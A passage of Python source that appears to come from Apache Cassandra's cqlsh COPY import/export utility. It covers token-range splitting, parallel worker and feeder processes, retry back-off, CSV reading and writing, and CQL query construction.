Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if curr < begin_token:
return None
elif (prev is None) or (prev < begin_token):
ret = (begin_token, curr)
if end_token:
if (ret[0] is not None) and (ret[0] > end_token):
return None
elif (curr is not None) and (curr > end_token):
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = list(shell.get_ring(self.ks).items())
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
elif previous is None and (not end_token or previous < end_token):
previous = begin_token if begin_token else min_token
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
this cases we will not work in parallel, we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, list(ranges.keys()))
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source is a named tuple
wrapping the source input, file name and a boolean indicating
if it requires closing.
"""
def make_source(fname):
try:
return open(fname, 'r')
except IOError as e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = next(self.sources)
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
next(self.current_source)
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in range(min(max_rows, self.chunk_size)):
try:
row = next(self.current_source)
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return [_f for _f in rows if _f]
class PipeReader(object):
"""
A class for reading rows received on a pipe, this is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in range(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable and we have different global counters for giving up when
a maximum has been reached. We consider value and type errors as parse errors as well since they
are typically non recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.insert_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
columns = "[" + ", ".join(self.valid_columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
shell.printerr(str(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in case of file the child process would close it). This is a very primitive support
for STDIN import in that we we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print()
def import_records(self):
"""
Keep on running until we have stuff to receive or send and until all processes are running.
Send data (batches or retries) up to the max ingest rate. If we are waiting for stuff to
receive check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
child_timeout = self.options.copy['childtimeout']
last_recv_num_records = 0
last_recv_time = time.time()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.feeding_result is not None:
if self.receive_meter.total_records != last_recv_num_records:
last_recv_num_records = self.receive_meter.total_records
last_recv_time = time.time()
elif (time.time() - last_recv_time) > child_timeout:
self.shell.printerr("No records inserted in {} seconds, aborting".format(child_timeout))
break
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records() - self.error_handler.num_rows_failed,
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results from the worker processes, which will send the number of rows imported
or from the feeder process, which will send the number of rows sent when it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options):
super(FeedingProcess, self).__init__(target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = [c for c in channels if c.num_pending() < max_pending_chunks]
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
An child worker process, this is for common functionality between ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
super(ChildProcess, self).__init__(target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
# attributes for coverage
self.coverage = params['coverage']
self.coveragerc_path = params['coveragerc_path']
self.coverage_collection = None
self.sigterm_handler = None
self.sighup_handler = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
def start_coverage(self):
import coverage
self.coverage_collection = coverage.Coverage(config_file=self.coveragerc_path)
self.coverage_collection.start()
# save current handlers for SIGTERM and SIGHUP
self.sigterm_handler = signal.getsignal(signal.SIGTERM)
self.sighup_handler = signal.getsignal(signal.SIGTERM)
def handle_sigterm():
self.stop_coverage()
self.close()
self.terminate()
# set custom handler for SIGHUP and SIGTERM
# needed to make sure coverage data is saved
signal.signal(signal.SIGTERM, handle_sigterm)
signal.signal(signal.SIGHUP, handle_sigterm)
def stop_coverage(self):
self.coverage_collection.stop()
self.coverage_collection.save()
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGHUP, self.sighup_handler)
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
An child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
if self.coverage:
self.start_coverage()
try:
self.inner_run()
finally:
if self.coverage:
self.stop_coverage()
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
while psutil.virtual_memory().percent > 80:
time.sleep(60)
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = str(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in list(self.hosts_to_sessions.values()))
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect we report an error so that the token will
be retried again later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception as e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in list(self.hosts_to_sessions.keys()):
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO() if six.PY3 else BytesIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(list(map(self.format_value, row, cql_types)))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception as e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
formatted = formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
return formatted if six.PY3 else formatted.encode('utf8')
def close(self):
ChildProcess.close(self)
for session in list(self.hosts_to_sessions.values()):
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImmutableDict(frozenset):
"""
Immutable dictionary implementation to represent map types.
We need to pass BoundStatement.bind() a dict() because it calls iteritems(),
except we can't create a dict with another dict as the key, hence we use a class
that adds iteritems to a frozen set of tuples (which is how dict are normally made
immutable in python).
Must be declared in the top level of the module to be available for pickling.
"""
iteritems = frozenset.__iter__
def items(self):
for k, v in self.iteritems():
yield k, v
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. As far as I understood this is the easiest
way to find out the types of the partition columns, we will never use this prepared statement
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(ensure_str(select_query))
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value the can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
